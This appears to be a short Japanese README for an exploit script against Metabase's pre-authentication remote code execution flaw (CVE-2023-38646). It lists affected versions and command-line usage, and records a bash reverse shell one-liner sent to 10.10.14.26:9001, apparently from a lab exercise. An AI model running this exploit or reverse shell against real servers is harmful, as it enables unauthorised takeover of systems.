
Metabase の事前認証RCE(CVE-2023-38646)のエクスプロイトスクリプト
これは、Metabaseのログインソフトウェアのリモートコード実行脆弱性を悪用するPythonスクリプトです。認証前にサーバ上で任意のコマンドを実行できます。
脆弱なバージョンは、Metabaseオープンソース0.46.6.1未満、Metabase Enterprise 1.46.6.1未満です。
python3 exploit.py -u URL -t TOKEN -c COMMAND
-h, --help このヘルプメッセージを表示して終了
-u URL, --url URL ターゲットURL
-t TOKEN, --token TOKEN
/api/session/properties で見つかったSetup-Token
-c COMMAND, --command COMMAND
ターゲットホストで実行するコマンド

使用したコマンド: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1
Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)